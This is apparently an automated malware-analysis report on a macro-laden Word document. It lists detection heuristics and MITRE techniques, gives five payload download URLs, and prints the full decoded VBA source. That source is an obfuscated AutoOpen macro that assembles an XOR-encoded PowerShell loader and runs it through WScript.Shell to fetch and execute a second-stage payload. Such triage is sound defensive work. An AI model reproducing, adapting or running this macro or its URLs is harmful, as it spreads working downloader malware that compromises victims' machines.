Verdict: MALICIOUS
Risk Score: 410

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059.001 PowerShell
- T1204.002 Malicious File
The sample contains VBA macros that utilize WScript.Shell and CreateObject to execute commands. The AutoOpen macro attempts to construct and execute a PowerShell command, which is likely responsible for downloading a second-stage payload from one of the embedded URLs. The obfuscated nature of the script and the presence of multiple suspicious URLs indicate downloader or dropper functionality.
Heuristics (12)

- ClamAV: Doc.Malware.Valyria-6874850-0 (critical; CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Valyria-6874850-0
- VBA macros detected (medium; OLE_VBA_MACROS; 6 related findings): Document contains VBA macro code
- Shell() call in VBA (critical; OLE_VBA_SHELL): Shell() call in VBA. Matched line in script:
  `TBQjR = (zAiMS + QkPpum / 38376 + VURRC + (KvaVj - WfvHQ)) cEMJkBV = wTtWr + CreateObject("Wscript.shell").Run(LBSHcj + Chr(vbKeyP) + lzqwO + Chr(vbKeyO) + VzMFjdrnQo + KoGzwaT, 960952536 - 960952536) PXmtC = (Tiqwa + FIGbzw / 68583 + jBqCZJ + (SRloHZ - XwibSw))`
- WScript.Shell usage (critical; OLE_VBA_WSCRIPT): WScript.Shell usage. Matched line in script: the same `CreateObject("Wscript.shell").Run` line quoted above.
- CreateObject call (high; OLE_VBA_CREATEOBJ): CreateObject call. Matched line in script: the same `CreateObject("Wscript.shell").Run` line quoted above.
- Payload URL decoded from an encoded PowerShell loader (5 URLs) (high; OLE_VBA_ENCODED_PS_DROPPER_URL): A VBA macro assembles (from literals scattered across helper functions) a WScript.Shell command that runs a PowerShell stage-2 loader whose download URL is hidden in a numeric char-code array — decoded at runtime by [char]($_ -bxor k) (or +k / -k) after splitting on obfuscated delimiters. The decoded hosts (often an @-separated fallback list dropped to %TEMP% and executed) are the next-stage payload URLs, never contiguous on disk; surfaced as IOCs. Self-validating: only a transform yielding a valid host URL is reported.
- VBA p-code auto-exec with execution tokens (high; OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low; OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script:
  `Attribute VB_Name = "nKhfkHl" Sub AutoOpen() On Error Resume Next`
- Reference to Windows Script Host (high; SC_STR_WSCRIPT): Reference to Windows Script Host
- Legacy WordBasic auto-exec macro marker (medium; OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (medium; EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info; EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://www.trustytampa.com/441uuNO9/ (referenced by macro)
  - http://www.intranet-sodimavi.com/AAFi9FkeO/ (referenced by macro)
  - http://www.qpalconsultancy.com/wp-content/O5CjQTL/ (referenced by macro)
  - http://www.sonaedons.com/eFtSiFT/ (referenced by macro)
  - https://www.mababo-bau.eu/CHXJmm/ (referenced by macro)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9589 bytes |

SHA-256: 363e0f9b3bc0da9c6686443ba79f1c44b8a6869c1cb8e06b7e3c480811c53ffe

Detection (macros.bas):
- ClamAV: No threats found
- Obfuscation or payload: likely. 154 of 284 identifiers look randomly generated (e.g. 'AzXmHjhvmXMlE') — consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "JSMwwrImcuHn"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "nKhfkHl"
Sub AutoOpen()
On Error Resume Next
zcdwOQ = 44165 * HZsjNk + 89297 / uNqFt / RwvWw * sTmrb + 7331 * QUvKj / fdMlQw / lhMTb
KFTWSl = 81658 * jUjJw + 25539 / AFlpZ / rjaWn * PUuCvf + 65072 * BWXzf / YIEBwo / kqHfiu
SYsAf = 89573 * DlSoiQ + 13239 / dhlJj / ibZXwP * dmWRkV + 76352 * iXUlRV / mNUYU / MatVO
rqKfBs = 34260 * jnnAI + 19090 / dqzCGI / jFMiZ * XLHSQz + 22722 * GpuRR / wpYlIm / IrMQUT
kwTcj = 60072 * ZwvXtu + 36886 / zKRYOX / pLCau * RMcvV + 4211 * fLunF / wXqqb / BUNPcw
kImwJ = 84622 * EpSbCm + 69084 / lwwzCn / bFYMG * fzBWNl + 91467 * RVXdH / wFnBwC / nDBfF
hjjZzl = 83999 * rQFoA + 77617 / TaZUu / GWSXN * bstAq + 14515 * Ojkva / PLEoiM / NqTdcL
vYHHa = 12040 * fImSbX + 85714 / OoQiS / bowVbw * wEzAzV + 12256 * YDUhVq / lXPDkm / YzwdI
AzXmHjhvmXMlE (BmdoJak + vLJik + SrWkjM + hHzwzJW)
dbKOC = 69247 * QjzQPh + 91122 / pjiwci / BhjKOq * ZQYfwb + 74589 * WsqKz / GXTfDn / kzdij
WiSOM = 17873 * vSQwmU + 55362 / VVkmwL / VijlcC * SDYhP + 39133 * ccnMfY / IhwZG / OBcjQ
jIohbj = 72157 * AMZFFI + 84388 / szaTml / zkLWc * QaoQao + 49725 * vLfuiE / HrUwhW / fIzCu
ZcisVq = 60502 * hsjkT + 75941 / MlHSf / vKQfL * kpRuz + 31260 * NvrAVT / XZfju / AjXNVP
End Sub
Function BmdoJak()
On Error Resume Next
HOGan = 10948 * jpjWa + GRjPt * GBFqX - 11684 / TUDAM
coXprE = (wFtuH + 23757)
jUzVaV = (RuFPpz + 46342)
zRzcur = (QBXjUh + 73792)
sjpkDwuNkS = "wers" + "hell " + " " + " " + " [St" + "riNg" + "]::Joi" + "n" + Chr(40) + " '' ," + Chr(40) + " '58s106" + "a84k79~35"
qBXhTT = (FYSpB + 8277)
FAqAH = (OsdcPR + 31937)
zrBRfw = (aRJjit + 40272)
izjVVK = (LmOSu + 43053)
ptNWGS = "{112G123" + "s105" + "&51j113" + "j124{" + "116&123j1" + "25&106" + "G62j80j12" + "3G106s48s"
OBlahN = (SGjjob + 61938)
KRTWhd = (PNKGWE + 23446)
DMBHJ = (JphlW + 57968)
WHFDtm = (kcrNIb + 74732)
oMlVrntY = "73>123" + ">124>93s" + "114a" + "119G" + "123j1" + "12b106" + "b37G" + "58{110s1"
pLjzv = (afupji + 50563)
Zhwzzu = (MYwpj + 74768)
owiZP = (QRzwMw + 84535)
smPrYZ = (BZcrv + 67724)
Sdkjm = "00G7" + "1~35s57" + "a118>" + "106s" + "106{1" + "10G36a4" + "9G49{1" + "05&1" + "05~10" + "5{48" + "k106b10" + "8k107k"
LnnzG = (nHZrGA + 35771)
Hswbm = (SNVkHj + 86849)
YGiUwf = (SzNwzS + 60832)
TCrmi = (morozz + 35324)
bwCkcPzQ = "109j106s1" + "03k106" + "G127b115" + "s110{127a" + "48b125a1" + "13&1" + "15k4" + "9~42k42" + "&47j1" + "07>10"
aCJRHs = (pOOoz + 74508)
iknpB = (WpnaG + 65115)
rfwhZ = (qUzVf + 84283)
FjHiww = (OofipZ + 1268)
PooRsc = "7>80~" + "81~39&4" + "9>94~11" + "8~10" + "6s10" + "6~110>36s" + "49b49"
FFnlQw = (IHjpA + 81356)
WBzoK = (UpaiGX + 52056)
CANrz = (YqMiq + 82242)
irTErO = (JjrzZd + 98450)
GTMYF = "G105" + ">105k1" + "05b48b1" + "19>112G1" + "06b108~" + "127&" + "112{123s" + "106{51" + "b109~11" + "3s122~1" + "19~11" + "5G127{10"
BmdoJak = sjpkDwuNkS + ptNWGS + oMlVrntY + Sdkjm + bwCkcPzQ + PooRsc + GTMYF
sEuZA = (Roiwl + 86865)
siWzDR = (AjJPk + 22623)
TIQSWL = (TLkBj + 95972)
BtWkr = (tqnCA + 56142)
End Function
Function vLJik()
On Error Resume Next
vjUtt = (EPuHN + 88563)
dnOmJu = (YLvzr + 62818)
AcVOS = (fVlplw + 27739)
NVjGAf = (zKSIG + 51637)
dmbIGrX = "4s119>4" + "8j125s113" + ">115>49a" + "95&95G88" + "j119s3" + "9>88j117b" + "123a81{49" + "{94>" + "118{1" + "06s106" + "a110{" + "36&49G"
KrjuiJ = (uKBNON + 5144)
NZujBG = (qmYdz + 25587)
CFLSD = (zawpTo + 78738)
oJJzR = (SjObRl + 67731)
wRdMrGnzSQ = "49>105b" + "105&105" + "G48b111~1" + "10>127" + "G114k125" + "G113b1" + "12b10" + "9b107G" + "114b106" + ">127s112{"
kFLUB = (VsDPvQ + 98707)
HVVfkl = (pwCYM + 82544)
rjARI = (NZunm + 65781)
wWkVS = (BzIQz + 68775)
fYTnHjdi = "125k1" + "03{48>12" + "5&11" + "3k115k49" + ">105~" + "110s51"
DLLXhT = (XVTtdq + 95704)
zBmHvJ = (QjVij + 62011)
iSDhK = (rEOCA + 51531)
zULJb = (zozsPQ + 28950)
nGBqbPj = "~125b113b" + "112&10" + "6k12" + "3&112~" + "106G49{81" + "k43G93~11" + "6j79a74~" + "82>49"
GwVjs = (XAIkC + 20078)
tCEkJp = (JiMlDU + 7869)
jlZnR = (drCcvF + 32986)
jkqfuz = (hAXjXr + 22893)
JmRzRXwYaf = "~94k118" + "~106G106" + "k110{" + "36s4" + "9k49a" + "105G105~1" + "05j4" + "8j109>1" + "13k1" + "12s1" + "27&1"
Zabio = (REHKO + 97858)
wauqsH = (Shlbuu + 66686)
CDtDRs = (ZqUHA + 9759)
ISIwRd = (wIwIXi + 52642)
wknEQw = "23>122a11" + "3b11" + "2&109~" + "48>125~1" + "13G11" + "5{49s1" + "23k88a10"
ThjoJ = (zNwVFD + 90189)
UnDjUm = (QMSoLH + 45390)
utKict = (MJMTdz + 51207)
qikPC = (bouRLz + 24386)
ZKZlFwYD = "6k77&" + "119{88~" + "74&49j94" + "&118k106k" + "106~110s" + "109>36b" + "49j49j10" + "5k105~1" + "05s4" + "8k115G12"
VjmYC = (nUosV + 37569)
rhSPr = (TmAvAs + 56149)
QQRwh = (pYQti + 76271)
ZWSar = (DQYlY + 48420)
qWmBnpLjK = "7G124" + "~127~124&" + "113~51k" + "124&127{" + "107j48s12" + "3b107~4" + "9j93a86&" + "70a84>115" + "~115>" + "49b57"
iwFmHk = (jRCNAA + 30161)
QPCrw = (zJQHV + 9874)
rftWYW = (GABfU + 61520)
aRiOc = (STwQo + 49523)
tzEGn = "~48>7" + "7G110j1" + "14a119&1" + "06&54k5" + "7&94&57k" + "55>37~58s" + "89>110G" + "118a6" + "2{35>" + "62a57k" + "44>41~4" + "0s57>37~5"
vLJik = dmbIGrX + wRdMrGnzSQ + fYTnHjdi + nGBqbPj + JmRzRXwYaf + wknEQw + ZKZlFwYD + qWmBnpLjK + tzEGn
arEkc = (EIqki + 72598)
VCZfX = (aJbmj + 59502)
uWXhc = (wMrqwK + 63508)
iOJJM = (GuaPN + 76714)
End Function
Function SrWkjM()
On Error Resume Next
GJjBGa = (AWtjaS + 54524)
XzJsEE = (IJffPq + 53469)
zvHTo = (cJRLa + 8853)
HGcai = (CzLZJ + 74504)
AzXzvLS = "8~119G119" + "b83a" + "35k58{12" + "3&11" + "2&104j3" + "6b106a1" + "23b115s11" + "0~53{57" + "&66>5"
ARpfWo = (PRGvsZ + 38769)
MDoVJ = (itoAAr + 66981)
Wwjwnd = (ZHVbwz + 51280)
LozYwu = (dQDiks + 73974)
QakzsiMGfo = "7>53>58" + "a89b110G" + "118>5" + "3s57~4" + "8~123" + "{102>12" + "3j57~3" + "7~12" + "0&113{1"
uqwoU = (GuBXum + 40834)
CRbWL = (BiHtE + 69708)
sJtHm = (JXJbRQ + 54776)
JXwCAT = (NivYr + 2784)
sPbLGnZuNK = "08G123~" + "127j125a" + "118j" + "54>58" + "k73k87" + "{117s62"
XhUXDS = (ldbsm + 2686)
jkJYVC = (KJnHB + 78598)
fbzjvz = (VsAuFK + 89137)
PCzQTw = (NXUYpj + 47422)
XOIhii = ">119>112G" + "62s58" + "a110{" + "100~71k55" + "j101&106a" + "108a10" + "3{101" + ">58G106" + "~84j" + "79{48~" + "90a113j10" + "5b112~"
dwIRF = (YvVhv + 97730)
oPccW = (jvmfvF + 75143)
aOWHM = (BQJvmY + 54973)
sndMw = (tuWQYa + 20799)
rGXrEAAuqRK = "114j" + "113a127>" + "122~" + "88j1" + "19b1" + "14~123s" + "54G58a73b"
TCWsd = (jHsVz + 14083)
ljWHd = (UCCjw + 18596)
jsGil = (jcuTJB + 76359)
wAzRr = (paTuf + 95304)
TzMnYrDQr = "87j117s" + "50>62j58&" + "119s11" + "9~83&" + "55k37s" + "77a106" + "a127k"
SrWkjM = AzXzvLS + QakzsiMGfo + sPbLGnZuNK + XOIhii + rGXrEAAuqRK + TzMnYrDQr
DaZiM = (pljGuD + 15009)
RCZcD = (MpwdU + 88228)
iGZLD = (izvXMj + 72830)
TuTAH = (BPAkh + 77974)
End Function
Function hHzwzJW()
On Error Resume Next
kFiBW = (FVRonu + 92941)
mhHlL = (roqfp + 38663)
BPFoiO = (QvVvIL + 48256)
XQwGlm = (kzNBjm + 1807)
VoOiZuTT = "108k1" + "06s51{78" + "a108j113&" + "125{123s1" + "09k109s6" + "2k58k119" + "G119s83a" + "37~1" + "24s10" + "8~123"
IFNUj = (tYonKz + 11006)
wnFulO = (AwEcZ + 84320)
FacftP = (jNBZNE + 62116)
IbwSmc = (AjCuHp + 97719)
sjoiSrjKqbO = "G127a1" + "17b37{99k" + "125a127" + "{106s125a" + "118G10" + "1~99&" + "99'." + "SplIt" + Chr(40) + " 'b" + "sa{>G"
vSnNw = (LOiTCM + 50971)
lsZnR = (zvkpY + 13432)
cwIrkT = (lIJuN + 90142)
zOJCBn = (kHutTi + 65946)
CCwhvbfjLwL = "~k&j" + "' " + Chr(41) + " | " + "FOrEa" + "cH-obJ" + "ecT {[" + "cHaR]" + Chr(40) + " $"
JdSjk = (OQKAKm + 21215)
rPBGjH = (mYnkjm + 23375)
qOwRkW = (WRVZdD + 3383)
YNdjc = (ibKizT + 86127)
wjwQwmORJPq = "_-BXOr" + " " + Chr(34) + "0x1e" + Chr(34) + " " + Chr(41) + "} " + Chr(41) + " " + Chr(41) + " |ieX "
hHzwzJW = VoOiZuTT + sjoiSrjKqbO + CCwhvbfjLwL + wjwQwmORJPq
JHjMzl = (jFiQMm + 77429)
Puuzp = (jwrmp + 72222)
mDkvZG = (XXulm + 78720)
wvoSfA = (QGvqEi + 91857)
End Function
Attribute VB_Name = "rzQKIIjlkoiUSE"
Function AzXmHjhvmXMlE(VzMFjdrnQo)
On Error Resume Next
vYIjQp = (qYuPHv + SXtizz / 90881 + lVVLW + (qdPSK - NYtNfB))
amNsb = (EWGanG + pannL / 10048 + pAuiz + (AStijz - sViXct))
RjjDc = (KEnlG + ahPZs / 67082 + ipmccu + (LIUsQK - kBJQq))
mmviI = (iZNcv + oiOiiE / 13499 + nzCjv + (wjpfF - BfHsu))
TEQPz = (ZCbcDF + FJhPm / 70238 + jnbuj + (WmnIaW - XkCtXC))
KstUf = (IAzUQU + iYjdV / 62179 + InOSB + (VzUHos - OBqtHO))
YVmTsF = (BwEYX + mNWiaS / 96505 + IjrjY + (thhmWH - qmAvaw))
TBQjR = (zAiMS + QkPpum / 38376 + VURRC + (KvaVj - WfvHQ))
cEMJkBV = wTtWr + CreateObject("Wscript.shell").Run(LBSHcj + Chr(vbKeyP) + lzqwO + Chr(vbKeyO) + VzMFjdrnQo + KoGzwaT, 960952536 - 960952536)
PXmtC = (Tiqwa + FIGbzw / 68583 + jBqCZJ + (SRloHZ - XwibSw))
TZOUdP = (tvhzYR + OjkTtr / 1609 + FHSYT + (KsVfnA - bchwt))
ZWDrj = (KJPzH + EzDTG / 3451 + vpjCL + (kROmE - Xzpbt))
QjQJb = (uNFjDJ + VfrzN / 80270 + rZzqv + (KukZP - JRqSo))
End Function